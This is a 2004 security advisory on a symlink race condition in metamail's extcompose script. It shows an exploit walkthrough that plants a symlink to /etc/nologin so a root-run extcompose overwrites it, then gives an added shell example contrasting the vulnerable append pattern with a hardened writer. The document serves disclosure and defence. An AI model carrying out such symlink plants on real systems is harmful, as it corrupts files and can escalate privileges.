extcompose.txt
Posted Mar 13, 2004
Authored by Shaun Colley | Site nettwerked.co.uk

Extcompose, a function of the metamail package, fails to properly verify a file exists prior to writing to it, and will accept symbolic links, leaving it open to being an attack vector.

tags | advisory
SHA-256 | ecb0d56a71d017b5a7e9ee58f1fd7f55abb82c34705174f94c74945fd4205bde

~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*

Product: Extcompose included with the common
metamail package.
https://bmrc.berkeley.edu/~trey/emacs/metamail.html

Versions: All
Bug: Symlink bug / race condition
Impact: Attackers can write to arbitrary files,
and in theory, elevate privileges
Date: March 11, 2004
Author: Shaun Colley
Email: shaunige@yahoo.co.uk
WWW: https://www.nettwerked.co.uk

~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*



Introduction
#############

With the popular 'metamail' package (included in most
popular Linux distributions), there is a script
included called 'extcompose' (usually located at
/usr/bin/extcompose and /usr/bin/extcompose.sigh).

A symlink vulnerability exists in the extcompose
script, which can allow an attacker to overwrite/write
to arbitrary files with the privileges of the invoking
user, due to the fact that Extcompose does not check
that the output filename is not a symlink.

Due to the popularity of metamail, extcompose is
present on a large percentage of Linux systems.

"The extcompose program will allow a user on a
properly-equipped work-station to enter the
appropriate data to enable a mail message he is
sending to make reference to "external" data, that is,
data that is not included in the mail message itself
but is otherwise available on the network via a
suitable mechanism." - From the extcompose(1) man
page.



The bug
########

The vulnerability presents itself when extcompose
takes user data and writes the relevant output to the
file specified by the user on the command line. The
extcompose script, unfortunately, does not check for
the existence of the output file specified, nor does it
check for the possibility of the filename specified
being a symlink - it just *blindly* writes its output
to the file with a bunch of "echo [data] >> file"
commands.

If an attacker creates a symlink with the name of the
file specified by the invoking user of the script,
arbitrary files can be corrupted/overwritten with the
privileges of the invoking user, and in theory,
privileges could possibly be elevated.

For example, if extcompose were run by root and an
attacker had created a symlink to /etc/nologin, or to a
more sensitive file, the results could be quite severe.
An example attack is demonstrated below.

Due to the fact that an attacker must know the
filename specified by the invoking user of extcompose
in order to create the symlink, this could be
considered a race condition (i.e. the attacker might
see the unsuspecting user typing the command in an
office environment, and quickly create the symlink
using her terminal).


The exploit
############

An example exploit scenario is demonstrated below:


##
kid$ ln -s /etc/nologin /directory/mailfile

[...]

root# /usr/bin/extcompose /directory/mailfile

Where is the external data that you want this mail
message to reference?
1 -- In a local file
2 -- In an AFS file
3 -- In an anonymous FTP directory on the Internet
4 -- In an Internet FTP directory that requires a
valid login
5 -- Under the control of a mail server that will
send the data on request

Please enter a number from 1 to 5: 1

Enter the full path name for the file:
/home/shaun/outlooksploit.html
Please enter the MIME content-type for the externally
referenced data: text/plain

Is this data already encoded for email transport?
1 -- No, it is not encoded
2 -- Yes, it is encoded in base64
3 -- Yes, it is encoded in quoted-printable
4 -- Yes, it is encoded using uuencode
2

[...mailfile is written with generated MIME data...]

[...]

attack$ cat /etc/nologin
Content-type: message/external-body;
access-type=local-file;
name="/home/shaun/outlooksploit.html"

Content-type: text/plain
Content-transfer-encoding: base64
###


As demonstrated, extcompose does not safely deal with
file handling, thus presenting the possibility of
exploitation to overwrite/corrupt arbitrary files with
the privileges of the user running 'extcompose'. In
theory, this could lead to escalation of privileges.


#####
NOTE:
#####

The script '/usr/bin/extcompose.sigh', which is almost
identical, is also vulnerable.



The fix
########

No fix exists. I have attempted to contact the
author of metamail ('extcompose' is part of the
metamail package), but metamail is no longer
maintained, although it is still packaged in many
Linux distributions.


Workaround: Run 'extcompose' with a low privileged
account.
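As an added illustration (not code from the advisory or from the metamail package), the following script places the blind "echo [data] >> file" pattern described in the bug section beside a hardened writer of the kind a maintainer could adopt. The function names unsafe_write, safe_write and demo are hypothetical, and the header lines and file names are constructed to mirror the transcript above.

```shell
#!/bin/sh
# Added example, not from the advisory or from metamail: the blind
# "echo [data] >> file" pattern next to a writer that refuses to follow
# a planted symlink. Names are illustrative; the header lines are
# constructed to mirror the advisory's transcript.

# Vulnerable pattern: each append follows whatever the path resolves to.
unsafe_write() {
    out=$1
    echo "Content-type: message/external-body;" >> "$out"
    echo "Content-type: text/plain" >> "$out"
}

# Hardened writer. The explicit tests only give a clear diagnostic; the real
# guard is noclobber (set -C), under which the shell creates the file with
# O_EXCL, so a symlink (even a dangling one) planted after the tests still
# makes the open fail instead of redirecting the output. All output goes
# through that single open, so there is no second window to race.
safe_write() {
    out=$1
    if [ -L "$out" ] || [ -e "$out" ]; then
        echo "refusing: $out already exists or is a symbolic link" >&2
        return 1
    fi
    (
        set -C
        {
            echo "Content-type: message/external-body;"
            echo "Content-type: text/plain"
        } > "$out"
    ) 2>/dev/null
}

# Stand-alone demonstration in a temporary directory constructed here.
demo() {
    tmp=$(mktemp -d) || return 1
    printf 'original\n' > "$tmp/target"          # stands in for /etc/nologin
    ln -s "$tmp/target" "$tmp/mailfile"          # the planted symlink
    unsafe_write "$tmp/mailfile"
    echo "unsafe_write: target now contains $(wc -l < "$tmp/target") lines"
    printf 'original\n' > "$tmp/target"
    safe_write "$tmp/mailfile" && echo "safe_write: wrote through symlink?!"
    echo "safe_write: target still contains: $(cat "$tmp/target")"
    rm -rf "$tmp"
}
demo
```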



Credit
#######

Vulnerability discovered by shaun2k2 / Shaun Colley.




Thank you for your time.
Shaun.




